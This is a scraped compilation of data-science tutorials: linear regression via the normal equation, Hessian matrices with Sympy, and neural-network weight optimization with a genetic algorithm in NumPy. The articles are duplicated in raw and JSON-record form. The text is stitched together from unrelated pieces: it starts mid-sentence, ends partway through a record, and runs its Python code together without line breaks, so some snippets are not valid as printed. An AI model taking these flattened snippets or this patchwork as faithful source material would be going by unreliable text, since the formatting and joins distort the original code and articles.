a computationally expensive operation — depending on the implementation, in a big O notation it is O(n3) or slightly less. This means is scales up horribly, practically meaning that when you double number of features, the computational times increases by 23 = 8 times. There is also some chance that the result of step 2 is not invertible at all — causing big troubles. These are the reasons why in practice this approach is uncommon. On the bright side, this approach is calculated just in one step and you don’t have to choose the learning rate parameter. Additionally, it terms of memory usage this approach is linear O(m) meaning it stores huge datasets effectively if they only fit into your computer’s memory.
[ { "code": null, "e": 188, "s": 172, "text": "1. Introduction" }, { "code": null, "e": 432, "s": 188, "text": "Linear regression is one of the most important and popular predictive techniques in data analysis. It’s also one of the oldest - famous C.F. Gauss at the beginning of 19th-century was using it in the astronomy for calculation of orbits (more)." }, { "code": null, "e": 655, "s": 432, "text": "Its objective is to fit the best line (or a hyper-/plane) to the set of given points (observations) by calculating regression function parameters that minimize specific cost function (error), e.g. mean squared error (MSE)." }, { "code": null, "e": 736, "s": 655, "text": "As a reminder, below there is a linear regression equation in the expanded form." }, { "code": null, "e": 777, "s": 736, "text": "In a vectorized form it looks like that:" }, { "code": null, "e": 820, "s": 777, "text": "where θ is a vector of parameters weights." }, { "code": null, "e": 1139, "s": 820, "text": "Usually finding the best model parameters is performed by running some kind of optimization algorithm (e.g. gradient descent) to minimize a cost function. However, it is possible to obtain values (weights) of these parameters by solving an algebraic equation called the normal equation as well. It is defined as below." }, { "code": null, "e": 1160, "s": 1139, "text": "2. Hand calculations" }, { "code": null, "e": 1430, "s": 1160, "text": "In this article, we will perform linear regression for a very basic case so we can avoid lengthy hand calculations. By the way, if you think you need to refresh your linear algebra skills, there are many good resources on the Internet (e.g. YouTube series I recommend)." }, { "code": null, "e": 1555, "s": 1430, "text": "In this example, there are only three points (observations) with only one variable (X1). On the graph, they look like below." }, { "code": null, "e": 1615, "s": 1555, "text": "In this case, the linear regression equation has a form of:" }, { "code": null, "e": 1648, "s": 1615, "text": "Features (X) and labels (y) are:" }, { "code": null, "e": 1788, "s": 1648, "text": "Note that we add a default bias term of 1 — it will be updated during our calculations. Not adding this term will lead to a wrong solution." }, { "code": null, "e": 1822, "s": 1788, "text": "Step 1: Transposition of matrix X" }, { "code": null, "e": 1882, "s": 1822, "text": "This is a relatively simple task — rows become new columns." }, { "code": null, "e": 1943, "s": 1882, "text": "Step 2: Multiplication on the transposed matrix and matrix X" }, { "code": null, "e": 1983, "s": 1943, "text": "Step 3: Inversion of a resultant matrix" }, { "code": null, "e": 2038, "s": 1983, "text": "To inverse a simple 2x2 matrix we can use the formula:" }, { "code": null, "e": 2057, "s": 2038, "text": "Therefore, we get:" }, { "code": null, "e": 2258, "s": 2057, "text": "Note: for bigger matrices (bigger than 3X3) inverting them becomes a much more cumbersome task and usually, the algorithmic approach is used — like Gaussian elimination. This is important to remember!" }, { "code": null, "e": 2322, "s": 2258, "text": "Step 4: Multiplication of the inverted matrix with X transposed" }, { "code": null, "e": 2391, "s": 2322, "text": "Step 5: Final multiplication to obtain the vector of best parameters" }, { "code": null, "e": 2446, "s": 2391, "text": "Finally our linear regression equations takes form of:" }, { "code": null, "e": 2505, "s": 2446, "text": "Plotting this line onto a previous graph looks like below." }, { "code": null, "e": 2533, "s": 2505, "text": "3. Implementation in Python" }, { "code": null, "e": 2681, "s": 2533, "text": "The same calculations can be implemented in Python using Numpy library which contains a set of linear algebra functions in numpy.linalg collection." }, { "code": null, "e": 2861, "s": 2681, "text": "import numpy as npX = np.c_[[1,1,1],[1,2,3]] # defining featuresy = np.c_[[1,3,2]] # defining labelstheta = np.linalg.inv(X.T.dot(X)).dot(X.T).dot(y) # normal equationprint(theta)" }, { "code": null, "e": 2929, "s": 2861, "text": "Now we can define new features we would like to predict values for." }, { "code": null, "e": 2985, "s": 2929, "text": "X_new = np.c_[[1,1,1,1],[0, 0.5,1.5,4]] # new features" }, { "code": null, "e": 3044, "s": 2985, "text": "By implementing equation 2 we obtain the predicted values." }, { "code": null, "e": 3105, "s": 3044, "text": "y_pred = X_new.dot(theta) # making predictionsprint(y_pred)" }, { "code": null, "e": 3117, "s": 3105, "text": "4. Comments" }, { "code": null, "e": 3263, "s": 3117, "text": "As you see it‘s pretty easy to use the normal equation and to implement it in Python — it’s only one line of code. So why it’s not commonly used?" }, { "code": null, "e": 3804, "s": 3263, "text": "The problem is in its numerical complexity. Solving this equation requires inverting a matrix and this is a computationally expensive operation — depending on the implementation, in a big O notation it is O(n3) or slightly less. This means is scales up horribly, practically meaning that when you double number of features, the computational times increases by 23 = 8 times. There is also some chance that the result of step 2 is not invertible at all — causing big troubles. These are the reasons why in practice this approach is uncommon." } ]
Hessian Matrix and Optimization Problems in Python 3.8 | by Louis Brulé Naudet | Towards Data Science
Recommendations Compatibility test performed with Python 3.8, executed on MacOS 11.3 and Linux Ubuntu Server 20.04 LTS environments. Libraries Used : Numpy, Sympy. pip3.8 install numpy sympy Hessian matrices are used in large-scale optimization problems within Newton-type methods because they are the coefficient of the quadratic term of a local Taylor expansion of a function. Partial derivatives play a prominent role in economics, in which most functions describing economic behaviour posit that the behaviour depends on more than one variable. For example, a societal consumption function may describe the amount spent on consumer goods as depending on both income and wealth; the marginal propensity to consume is then the partial derivative of the consumption function with respect to income. The Hessian matrix is also commonly used for expressing image processing operators in image processing and computer vision (see the Laplacian of Gaussian (LoG) blob detector). The Hessian matrix can also be used in normal mode analysis to calculate the different molecular frequencies in infrared spectroscopy. The Hessian matrix of a numerical function is the square matrix, noted H(f), of its second partial derivatives. In mathematics, a partial derivative of a function of several variables is its derivative with respect to one of those variables, with the others held constant. Example: The gradient vector can be interpreted as the “direction and rate of fastest increase”. If the gradient of a function is non-zero at a point p, the direction of the gradient is the direction in which the function increases most quickly from p, and the magnitude of the gradient is the rate of increase in that direction, the greatest absolute directional derivative. In an ordered set E, an element of a part A is the largest element or maximum of A, if it belongs to A and is greater than any other element of A. The existence of a maximum is in general not guaranteed for any part of an ordered set. On the other hand, under the existence condition, such an element is unique. Similarly, the smallest element or minimum is, if it exists, an element of A smaller than any other element of A. The objective is to determine the maximum or minimum candidate by solving the equation : Implementation in Python 3.8 is pretty simple, and needs the “solve” function in Sympy library. Now, we need to perform the second derivative to obtain the hessian matrix : By the way, here is the main function of the program, which arbitrates the assignment of variables between all blocks of instructions : In our program, we apply Schwarz’s theorem on the second partial derivatives of a function of several variables such that : However, we will not prove this theorem, nor will we try to explain it in this article. Here is an example of hessian matrix in numpy.matrix format, for the function : Hessian matrix that organizes all the second partial derivatives of the function x**2–1.5*x*y + y**2 is : [[2 -1.50000000000000][-1.50000000000000 2]]Determinant in the critical point {x: 0.0, y: 0.0} is : 1.75000000000000 The determinant is a scalar value that is a function of the entries of a square matrix. It allows characterizing some properties of the matrix and the linear map represented by the matrix. In particular, the determinant is nonzero if and only if the matrix is invertible, and the linear map represented by the matrix is an isomorphism. Thus, for positive-semidefinite and negative-semidefinite Hessians the test is inconclusive (a critical point where the Hessian is semidefinite but not definite may be a local extremum or a saddle point). In our example, for the critical point (0; 0), the determinant is 1.75 > 0 and f’xx > 0, then, the critical point is a local minimum, so the function is strictly convex. Tensorflow or other machine learning libraries are certainly powerful, but they are still excessively resource-intensive and can be an obstacle for low-performance machines, this article was intended to interpret a new way to build Hessian matrices, with a lighter tool for scientific computing: sympy. Louis Brulé Naudet, holds a double degree in Law and Economics/Management from the University of Paris-Saclay.
[ { "code": null, "e": 187, "s": 171, "text": "Recommendations" }, { "code": null, "e": 304, "s": 187, "text": "Compatibility test performed with Python 3.8, executed on MacOS 11.3 and Linux Ubuntu Server 20.04 LTS environments." }, { "code": null, "e": 335, "s": 304, "text": "Libraries Used : Numpy, Sympy." }, { "code": null, "e": 362, "s": 335, "text": "pip3.8 install numpy sympy" }, { "code": null, "e": 971, "s": 362, "text": "Hessian matrices are used in large-scale optimization problems within Newton-type methods because they are the coefficient of the quadratic term of a local Taylor expansion of a function. Partial derivatives play a prominent role in economics, in which most functions describing economic behaviour posit that the behaviour depends on more than one variable. For example, a societal consumption function may describe the amount spent on consumer goods as depending on both income and wealth; the marginal propensity to consume is then the partial derivative of the consumption function with respect to income." }, { "code": null, "e": 1282, "s": 971, "text": "The Hessian matrix is also commonly used for expressing image processing operators in image processing and computer vision (see the Laplacian of Gaussian (LoG) blob detector). The Hessian matrix can also be used in normal mode analysis to calculate the different molecular frequencies in infrared spectroscopy." }, { "code": null, "e": 1555, "s": 1282, "text": "The Hessian matrix of a numerical function is the square matrix, noted H(f), of its second partial derivatives. In mathematics, a partial derivative of a function of several variables is its derivative with respect to one of those variables, with the others held constant." }, { "code": null, "e": 1564, "s": 1555, "text": "Example:" }, { "code": null, "e": 1652, "s": 1564, "text": "The gradient vector can be interpreted as the “direction and rate of fastest increase”." }, { "code": null, "e": 1931, "s": 1652, "text": "If the gradient of a function is non-zero at a point p, the direction of the gradient is the direction in which the function increases most quickly from p, and the magnitude of the gradient is the rate of increase in that direction, the greatest absolute directional derivative." }, { "code": null, "e": 2357, "s": 1931, "text": "In an ordered set E, an element of a part A is the largest element or maximum of A, if it belongs to A and is greater than any other element of A. The existence of a maximum is in general not guaranteed for any part of an ordered set. On the other hand, under the existence condition, such an element is unique. Similarly, the smallest element or minimum is, if it exists, an element of A smaller than any other element of A." }, { "code": null, "e": 2446, "s": 2357, "text": "The objective is to determine the maximum or minimum candidate by solving the equation :" }, { "code": null, "e": 2542, "s": 2446, "text": "Implementation in Python 3.8 is pretty simple, and needs the “solve” function in Sympy library." }, { "code": null, "e": 2619, "s": 2542, "text": "Now, we need to perform the second derivative to obtain the hessian matrix :" }, { "code": null, "e": 2755, "s": 2619, "text": "By the way, here is the main function of the program, which arbitrates the assignment of variables between all blocks of instructions :" }, { "code": null, "e": 2879, "s": 2755, "text": "In our program, we apply Schwarz’s theorem on the second partial derivatives of a function of several variables such that :" }, { "code": null, "e": 3047, "s": 2879, "text": "However, we will not prove this theorem, nor will we try to explain it in this article. Here is an example of hessian matrix in numpy.matrix format, for the function :" }, { "code": null, "e": 3270, "s": 3047, "text": "Hessian matrix that organizes all the second partial derivatives of the function x**2–1.5*x*y + y**2 is : [[2 -1.50000000000000][-1.50000000000000 2]]Determinant in the critical point {x: 0.0, y: 0.0} is : 1.75000000000000" }, { "code": null, "e": 3358, "s": 3270, "text": "The determinant is a scalar value that is a function of the entries of a square matrix." }, { "code": null, "e": 3606, "s": 3358, "text": "It allows characterizing some properties of the matrix and the linear map represented by the matrix. In particular, the determinant is nonzero if and only if the matrix is invertible, and the linear map represented by the matrix is an isomorphism." }, { "code": null, "e": 3811, "s": 3606, "text": "Thus, for positive-semidefinite and negative-semidefinite Hessians the test is inconclusive (a critical point where the Hessian is semidefinite but not definite may be a local extremum or a saddle point)." }, { "code": null, "e": 3981, "s": 3811, "text": "In our example, for the critical point (0; 0), the determinant is 1.75 > 0 and f’xx > 0, then, the critical point is a local minimum, so the function is strictly convex." }, { "code": null, "e": 4284, "s": 3981, "text": "Tensorflow or other machine learning libraries are certainly powerful, but they are still excessively resource-intensive and can be an obstacle for low-performance machines, this article was intended to interpret a new way to build Hessian matrices, with a lighter tool for scientific computing: sympy." } ]
Artificial Neural Networks Optimization using Genetic Algorithm with Python | by Ahmed Gad | Towards Data Science
In a previous tutorial titled “Artificial Neural Network Implementation using NumPy and Classification of the Fruits360 Image Dataset” available in my LinkedIn profile at this link, an artificial neural network (ANN) is created for classifying 4 classes of the Fruits360 image dataset. The source code used in this tutorial is available in my GitHub page. This tutorial is also available at TowardsDataScience here. A quick summary of this tutorial is extracting the feature vector (360 bins hue channel histogram) and reducing it to just 102 element by using a filter-based technique using the standard deviation. Later, the ANN is built from scratch using NumPy. The ANN was not completely created as just the forward pass was made ready but there is no backward pass for updating the network weights. This is why the accuracy is very low and not exceeds 45%. The solution to this problem is using an optimization technique for updating the network weights. This tutorial uses the genetic algorithm (GA) for optimizing the network weights. It is worth-mentioning that both the previous and this tutorial are based on my 2018 book cited as “Ahmed Fawzy Gad ‘Practical Computer Vision Applications Using Deep Learning with CNNs’. Dec. 2018, Apress, 978–1–4842–4167–7 “. The book is available at Springer at this link. You can find all details within this book. The source code used in this tutorial is available in my GitHub page here. Before starting this tutorial, I recommended reading about how the genetic algorithm works and its implementation in Python using NumPy from scratch based on my previous tutorials found at the links listed in the Resources section at the end of the tutorial. After understanding how GA works based on numerical examples in addition to implementation using Python, we can start using GA to optimize the ANN by updating its weights (parameters). GA creates multiple solutions to a given problem and evolves them through a number of generations. Each solution holds all parameters that might help to enhance the results. For ANN, weights in all layers help achieve high accuracy. Thus, a single solution in GA will contain all weights in the ANN. According to the network structure discussed in the previous tutorial and given in the figure below, the ANN has 4 layers (1 input, 2 hidden, and 1 output). Any weight in any layer will be part of the same solution. A single solution to such network will contain a total number of weights equal to 102x150+150x60+60x4=24,540. If the population has 8 solutions with 24,540 parameters per solution, then the total number of parameters in the entire population is 24,540x8=196,320. Looking at the above figure, the parameters of the network are in matrix form because this makes calculations of ANN much easier. For each layer, there is an associated weights matrix. Just multiply the inputs matrix by the parameters matrix of a given layer to return the outputs in such layer. Chromosomes in GA are 1D vectors and thus we have to convert the weights matrices into 1D vectors. Because matrix multiplication is a good option to work with ANN, we will still represent the ANN parameters in the matrix form when using the ANN. Thus, matrix form is used when working with ANN and vector form is used when working with GA. This makes us need to convert the matrix to vector and vice versa. The next figure summarizes the steps of using GA with ANN. This figure is referred to as the main figure. Each solution in the population will have two representations. First is a 1D vector for working with GA and second is a matrix to work with ANN. Because there are 3 weights matrices for the 3 layers (2 hidden + 1 output), there will be 3 vectors, one for each matrix. Because a solution in GA is represented as a single 1D vector, such 3 individual 1D vectors will be concatenated into a single 1D vector. Each solution will be represented as a vector of length 24,540. The next Python code creates a function named mat_to_vector() that converts the parameters of all solutions within the population from matrix to vector. def mat_to_vector(mat_pop_weights): pop_weights_vector = [] for sol_idx in range(mat_pop_weights.shape[0]): curr_vector = [] for layer_idx in range(mat_pop_weights.shape[1]): vector_weights = numpy.reshape(mat_pop_weights[sol_idx, layer_idx], newshape=(mat_pop_weights[sol_idx, layer_idx].size)) curr_vector.extend(vector_weights) pop_weights_vector.append(curr_vector) return numpy.array(pop_weights_vector) The function accepts an argument representing the population of all solutions in order to loop through them and return their vector representation. At the beginning of the function, an empty list variable named pop_weights_vector is created to hold the result (vectors of all solutions). For each solution in matrix form, there is an inner loop that loops through its three matrices. For each matrix, it is converted into a vector using the numpy.reshape() function which accepts the input matrix and the output size to which the matrix will be reshaped. The variable curr_vector accepts all vectors for a single solution. After all vectors are generated, they get appended into the pop_weights_vector variable. Note that we used the numpy.extend() function for vectors belonging to the same solution and numpy.append() for vectors belonging to different solutions. The reason is that numpy.extend() takes the numbers within the 3 vectors belonging to the same solution and concatenate them together. In other words, calling this function for two lists returns a new single list with numbers from both lists. This is suitable in order to create just a 1D chromosome for each solution. But numpy.append() will return three lists for each solution. Calling it for two lists, it returns a new list which is split into two sub-lists. This is not our objective. Finally, the function mat_to_vector() returns the population solutions as a NumPy array for easy manipulation later. After converting all solutions from matrices to vectors and concatenated together, we are ready to go through the GA steps discussed in the tutorial titled “Introduction to Optimization with Genetic Algorithm”. The steps are presented in the main figure and also summarized in the next figure. Remember that GA uses a fitness function to returns a fitness value for each solution. The higher the fitness value the better the solution. The best solutions are returned as parents in the parents selection step. One of the common fitness functions for a classifier such as ANN is the accuracy. It is the ratio between the correctly classified samples and the total number of samples. It is calculated according to the next equation. The classification accuracy of each solution is calculated according to steps in the main figure. The single 1D vector of each solution is converted back into 3 matrices, one matrix for each layer (2 hidden and 1 output). Conversion takes place using a function called vector_to_mat(). It is defined in the next code. def vector_to_mat(vector_pop_weights, mat_pop_weights): mat_weights = [] for sol_idx in range(mat_pop_weights.shape[0]): start = 0 end = 0 for layer_idx in range(mat_pop_weights.shape[1]): end = end + mat_pop_weights[sol_idx, layer_idx].size curr_vector = vector_pop_weights[sol_idx, start:end] mat_layer_weights = numpy.reshape(curr_vector, newshape=(mat_pop_weights[sol_idx, layer_idx].shape)) mat_weights.append(mat_layer_weights) start = end return numpy.reshape(mat_weights, newshape=mat_pop_weights.shape) It reverses the work done previously. But there is an important question. If the vector of a given solution is just one piece, how we can split into three different parts, each part represents a matrix? The size of the first parameters matrix between the input layer and the hidden layer is 102x150. When being converted into a vector, its length will be 15,300. Because it is the first vector to be inserted in the curr_vector variable according to the mat_to_vector() function, then its indices start from index 0 and end at index 15,299. The mat_pop_weights is used as an argument for the vector_to_mat() function in order to know the size of each matrix. We are not interested in using the weights from the mat_pop_weights variable but just the matrices sizes are used from it. For the second vector in the same solution, it will be the result of converting a matrix of size 150x60. Thus the vector length is 9,000. Such a vector is inserted into the curr_vector variable just before the previous vector of length 15,300. As a result, it will start from index 15,300 and ends at index 15,300+9,000–1=24,299. The -1 is used because Python starts indexing at 0. For the last vector created from the parameters matrix of size 60x4, its length is 240. Because it is added into the curr_vector variable exactly after the previous vector of length 9,000, then its index will start after it. That is its start index is 24,300 and its end index is 24,300+240–1=24,539. So, we can successfully restore the vector into the original 3 matrices. The matrices returned for each solution are used to predict the class label for each of the 1,962 samples in the used dataset to calculate the accuracy. This is done using 2 functions which are predict_outputs() and fitness() according to the next code. def predict_outputs(weights_mat, data_inputs, data_outputs, activation="relu"): predictions = numpy.zeros(shape=(data_inputs.shape[0])) for sample_idx in range(data_inputs.shape[0]): r1 = data_inputs[sample_idx, :] for curr_weights in weights_mat: r1 = numpy.matmul(a=r1, b=curr_weights) if activation == "relu": r1 = relu(r1) elif activation == "sigmoid": r1 = sigmoid(r1) predicted_label = numpy.where(r1 == numpy.max(r1))[0][0] predictions[sample_idx] = predicted_label correct_predictions = numpy.where(predictions == data_outputs)[0].size accuracy = (correct_predictions/data_outputs.size)*100 return accuracy, predictionsdef fitness(weights_mat, data_inputs, data_outputs, activation="relu"): accuracy = numpy.empty(shape=(weights_mat.shape[0])) for sol_idx in range(weights_mat.shape[0]): curr_sol_mat = weights_mat[sol_idx, :] accuracy[sol_idx], _ = predict_outputs(curr_sol_mat, data_inputs, data_outputs, activation=activation) return accuracy The predict_outputs() function accepts the weights of a single solution, inputs, and outputs of the training data, and an optional parameter that specifies which activation function to use. It returns the accuracy of just one solution not all solutions within the population. It order to return the fitness value (i.e. accuracy) of all solutions within the population, the fitness() function loops through each solution, pass it to the predict_outputs() function, store the accuracy of all solutions into the accuracy array, and finally return such an array. After calculating the fitness value (i.e. accuracy) for all solutions, the remaining steps of GA in the main figure are applied the same way done previously. The best parents are selected, based on their accuracy, into the mating pool. Then mutation and crossover variants are applied in order to produce the offspring. The population of the new generation is created using both offspring and parents. These steps are repeated for a number of generations. The Python implementation for such project has three Python files: ga.py for implementing GA functions.ANN.py for implementing ANN functions.Third file for calling such functions through a number of generations. This is the main file of the project. ga.py for implementing GA functions. ANN.py for implementing ANN functions. Third file for calling such functions through a number of generations. This is the main file of the project. The third file is the main file because it connects all functions. It reads the features and the class labels files, filters features based on the standard deviation, creates the ANN architecture, generates the initial solutions, loops through a number of generations by calculating the fitness values for all solutions, selecting best parents, applying crossover and mutation, and finally creating the new population. Its implementation is given below. Such a file defines the GA parameters such as a number of solutions per population, number of selected parents, mutation percent, and number of generations. You can try different values for them. import numpyimport GAimport pickleimport ANNimport matplotlib.pyplotf = open("dataset_features.pkl", "rb")data_inputs2 = pickle.load(f)f.close()features_STDs = numpy.std(a=data_inputs2, axis=0)data_inputs = data_inputs2[:, features_STDs>50]f = open("outputs.pkl", "rb")data_outputs = pickle.load(f)f.close()#Genetic algorithm parameters:# Mating Pool Size (Number of Parents)# Population Size# Number of Generations# Mutation Percentsol_per_pop = 8num_parents_mating = 4num_generations = 1000mutation_percent = 10#Creating the initial population.initial_pop_weights = []for curr_sol in numpy.arange(0, sol_per_pop): HL1_neurons = 150 input_HL1_weights = numpy.random.uniform(low=-0.1, high=0.1, size=(data_inputs.shape[1], HL1_neurons)) HL2_neurons = 60 HL1_HL2_weights = numpy.random.uniform(low=-0.1, high=0.1, size=(HL1_neurons, HL2_neurons)) output_neurons = 4 HL2_output_weights = numpy.random.uniform(low=-0.1, high=0.1, size=(HL2_neurons, output_neurons)) initial_pop_weights.append(numpy.array([input_HL1_weights, HL1_HL2_weights, HL2_output_weights]))pop_weights_mat = numpy.array(initial_pop_weights)pop_weights_vector = ga.mat_to_vector(pop_weights_mat)best_outputs = []accuracies = numpy.empty(shape=(num_generations))for generation in range(num_generations): print("Generation : ", generation) # converting the solutions from being vectors to matrices. pop_weights_mat = ga.vector_to_mat(pop_weights_vector, pop_weights_mat) # Measuring the fitness of each chromosome in the population. fitness = ANN.fitness(pop_weights_mat, data_inputs, data_outputs, activation="sigmoid") accuracies[generation] = fitness[0] print("Fitness") print(fitness) # Selecting the best parents in the population for mating. parents = ga.select_mating_pool(pop_weights_vector, fitness.copy(), num_parents_mating) print("Parents") print(parents) # Generating next generation using crossover. offspring_crossover = ga.crossover(parents, offspring_size=(pop_weights_vector.shape[0]-parents.shape[0], pop_weights_vector.shape[1])) print("Crossover") print(offspring_crossover) # Adding some variations to the offsrping using mutation. offspring_mutation = ga.mutation(offspring_crossover, mutation_percent=mutation_percent) print("Mutation") print(offspring_mutation) # Creating the new population based on the parents and offspring. pop_weights_vector[0:parents.shape[0], :] = parents pop_weights_vector[parents.shape[0]:, :] = offspring_mutationpop_weights_mat = ga.vector_to_mat(pop_weights_vector, pop_weights_mat)best_weights = pop_weights_mat [0, :]acc, predictions = ANN.predict_outputs(best_weights, data_inputs, data_outputs, activation="sigmoid")print("Accuracy of the best solution is : ", acc)matplotlib.pyplot.plot(accuracies, linewidth=5, color="black")matplotlib.pyplot.xlabel("Iteration", fontsize=20)matplotlib.pyplot.ylabel("Fitness", fontsize=20)matplotlib.pyplot.xticks(numpy.arange(0, num_generations+1, 100), fontsize=15)matplotlib.pyplot.yticks(numpy.arange(0, 101, 5), fontsize=15)f = open("weights_"+str(num_generations)+"_iterations_"+str(mutation_percent)+"%_mutation.pkl", "wb")pickle.dump(pop_weights_mat, f)f.close() Based on 1,000 generations, a plot is created at the end of this file using Matplotlib visualization library that shows how the accuracy changes across each generation. It is shown in the next figure. After 1,000 iterations, the accuracy is more than 97%. This is compared to 45% without using an optimization technique as in the previous tutorial. This is an evidence about why results might be bad not because there is something wrong in the model or the data but because no optimization technique is used. Of course, using different values for the parameters such as 10,000 generations might increase the accuracy. At the end of this file, it saves the parameters in matrix form to the disk for use later. The ga.py file implementation is in listed below. Note that the mutation() function accepts the mutation_percent parameter that defines the number of genes to change their values randomly. It is set to 10% in the main file. Such a file holds the 2 new functions mat_to_vector() and vector_to_mat(). import numpyimport random# Converting each solution from matrix to vector.def mat_to_vector(mat_pop_weights): pop_weights_vector = [] for sol_idx in range(mat_pop_weights.shape[0]): curr_vector = [] for layer_idx in range(mat_pop_weights.shape[1]): vector_weights = numpy.reshape(mat_pop_weights[sol_idx, layer_idx], newshape=(mat_pop_weights[sol_idx, layer_idx].size)) curr_vector.extend(vector_weights) pop_weights_vector.append(curr_vector) return numpy.array(pop_weights_vector)# Converting each solution from vector to matrix.def vector_to_mat(vector_pop_weights, mat_pop_weights): mat_weights = [] for sol_idx in range(mat_pop_weights.shape[0]): start = 0 end = 0 for layer_idx in range(mat_pop_weights.shape[1]): end = end + mat_pop_weights[sol_idx, layer_idx].size curr_vector = vector_pop_weights[sol_idx, start:end] mat_layer_weights = numpy.reshape(curr_vector, newshape=(mat_pop_weights[sol_idx, layer_idx].shape)) mat_weights.append(mat_layer_weights) start = end return numpy.reshape(mat_weights, newshape=mat_pop_weights.shape)def select_mating_pool(pop, fitness, num_parents): # Selecting the best individuals in the current generation as parents for producing the offspring of the next generation. parents = numpy.empty((num_parents, pop.shape[1])) for parent_num in range(num_parents): max_fitness_idx = numpy.where(fitness == numpy.max(fitness)) max_fitness_idx = max_fitness_idx[0][0] parents[parent_num, :] = pop[max_fitness_idx, :] fitness[max_fitness_idx] = -99999999999 return parentsdef crossover(parents, offspring_size): offspring = numpy.empty(offspring_size) # The point at which crossover takes place between two parents. Usually, it is at the center. crossover_point = numpy.uint32(offspring_size[1]/2) for k in range(offspring_size[0]): # Index of the first parent to mate. parent1_idx = k%parents.shape[0] # Index of the second parent to mate. parent2_idx = (k+1)%parents.shape[0] # The new offspring will have its first half of its genes taken from the first parent. offspring[k, 0:crossover_point] = parents[parent1_idx, 0:crossover_point] # The new offspring will have its second half of its genes taken from the second parent. offspring[k, crossover_point:] = parents[parent2_idx, crossover_point:] return offspringdef mutation(offspring_crossover, mutation_percent): num_mutations = numpy.uint32((mutation_percent*offspring_crossover.shape[1])/100) mutation_indices = numpy.array(random.sample(range(0, offspring_crossover.shape[1]), num_mutations)) # Mutation changes a single gene in each offspring randomly. for idx in range(offspring_crossover.shape[0]): # The random value to be added to the gene. random_value = numpy.random.uniform(-1.0, 1.0, 1) offspring_crossover[idx, mutation_indices] = offspring_crossover[idx, mutation_indices] + random_value return offspring_crossover Finally, the ANN.py is implemented according to the code listed below. It contains the implementation of the activation functions (sigmoid and ReLU) in addition to the fitness() and predict_outputs() functions to calculate the accuracy. import numpydef sigmoid(inpt): return 1.0 / (1.0 + numpy.exp(-1 * inpt))def relu(inpt): result = inpt result[inpt < 0] = 0 return resultdef predict_outputs(weights_mat, data_inputs, data_outputs, activation="relu"): predictions = numpy.zeros(shape=(data_inputs.shape[0])) for sample_idx in range(data_inputs.shape[0]): r1 = data_inputs[sample_idx, :] for curr_weights in weights_mat: r1 = numpy.matmul(a=r1, b=curr_weights) if activation == "relu": r1 = relu(r1) elif activation == "sigmoid": r1 = sigmoid(r1) predicted_label = numpy.where(r1 == numpy.max(r1))[0][0] predictions[sample_idx] = predicted_label correct_predictions = numpy.where(predictions == data_outputs)[0].size accuracy = (correct_predictions / data_outputs.size) * 100 return accuracy, predictionsdef fitness(weights_mat, data_inputs, data_outputs, activation="relu"): accuracy = numpy.empty(shape=(weights_mat.shape[0])) for sol_idx in range(weights_mat.shape[0]): curr_sol_mat = weights_mat[sol_idx, :] accuracy[sol_idx], _ = predict_outputs(curr_sol_mat, data_inputs, data_outputs, activation=activation) return accuracy Introduction to Optimization with Genetic Algorithm https://www.linkedin.com/pulse/introduction-optimization-genetic-algorithm-ahmed-gad/ https://www.kdnuggets.com/2018/03/introduction-optimization-with-genetic-algorithm.html https://towardsdatascience.com/introduction-to-optimization-with-genetic-algorithm-2f5001d9964b https://www.springer.com/us/book/9781484241660 Genetic Algorithm (GA) Optimization — Step-by-Step Example https://www.slideshare.net/AhmedGadFCIT/genetic-algorithm-ga-optimization-stepbystep-example Genetic Algorithm Implementation in Python
[ { "code": null, "e": 527, "s": 171, "text": "In a previous tutorial titled “Artificial Neural Network Implementation using NumPy and Classification of the Fruits360 Image Dataset” available in my LinkedIn profile at this link, an artificial neural network (ANN) is created for classifying 4 classes of the Fruits360 image dataset. The source code used in this tutorial is available in my GitHub page." }, { "code": null, "e": 587, "s": 527, "text": "This tutorial is also available at TowardsDataScience here." }, { "code": null, "e": 836, "s": 587, "text": "A quick summary of this tutorial is extracting the feature vector (360 bins hue channel histogram) and reducing it to just 102 element by using a filter-based technique using the standard deviation. Later, the ANN is built from scratch using NumPy." }, { "code": null, "e": 1213, "s": 836, "text": "The ANN was not completely created as just the forward pass was made ready but there is no backward pass for updating the network weights. This is why the accuracy is very low and not exceeds 45%. The solution to this problem is using an optimization technique for updating the network weights. This tutorial uses the genetic algorithm (GA) for optimizing the network weights." }, { "code": null, "e": 1532, "s": 1213, "text": "It is worth-mentioning that both the previous and this tutorial are based on my 2018 book cited as “Ahmed Fawzy Gad ‘Practical Computer Vision Applications Using Deep Learning with CNNs’. Dec. 2018, Apress, 978–1–4842–4167–7 “. The book is available at Springer at this link. You can find all details within this book." }, { "code": null, "e": 1607, "s": 1532, "text": "The source code used in this tutorial is available in my GitHub page here." }, { "code": null, "e": 1866, "s": 1607, "text": "Before starting this tutorial, I recommended reading about how the genetic algorithm works and its implementation in Python using NumPy from scratch based on my previous tutorials found at the links listed in the Resources section at the end of the tutorial." }, { "code": null, "e": 2051, "s": 1866, "text": "After understanding how GA works based on numerical examples in addition to implementation using Python, we can start using GA to optimize the ANN by updating its weights (parameters)." }, { "code": null, "e": 2830, "s": 2051, "text": "GA creates multiple solutions to a given problem and evolves them through a number of generations. Each solution holds all parameters that might help to enhance the results. For ANN, weights in all layers help achieve high accuracy. Thus, a single solution in GA will contain all weights in the ANN. According to the network structure discussed in the previous tutorial and given in the figure below, the ANN has 4 layers (1 input, 2 hidden, and 1 output). Any weight in any layer will be part of the same solution. A single solution to such network will contain a total number of weights equal to 102x150+150x60+60x4=24,540. If the population has 8 solutions with 24,540 parameters per solution, then the total number of parameters in the entire population is 24,540x8=196,320." }, { "code": null, "e": 3225, "s": 2830, "text": "Looking at the above figure, the parameters of the network are in matrix form because this makes calculations of ANN much easier. For each layer, there is an associated weights matrix. Just multiply the inputs matrix by the parameters matrix of a given layer to return the outputs in such layer. Chromosomes in GA are 1D vectors and thus we have to convert the weights matrices into 1D vectors." }, { "code": null, "e": 3639, "s": 3225, "text": "Because matrix multiplication is a good option to work with ANN, we will still represent the ANN parameters in the matrix form when using the ANN. Thus, matrix form is used when working with ANN and vector form is used when working with GA. This makes us need to convert the matrix to vector and vice versa. The next figure summarizes the steps of using GA with ANN. This figure is referred to as the main figure." }, { "code": null, "e": 4262, "s": 3639, "text": "Each solution in the population will have two representations. First is a 1D vector for working with GA and second is a matrix to work with ANN. Because there are 3 weights matrices for the 3 layers (2 hidden + 1 output), there will be 3 vectors, one for each matrix. Because a solution in GA is represented as a single 1D vector, such 3 individual 1D vectors will be concatenated into a single 1D vector. Each solution will be represented as a vector of length 24,540. The next Python code creates a function named mat_to_vector() that converts the parameters of all solutions within the population from matrix to vector." }, { "code": 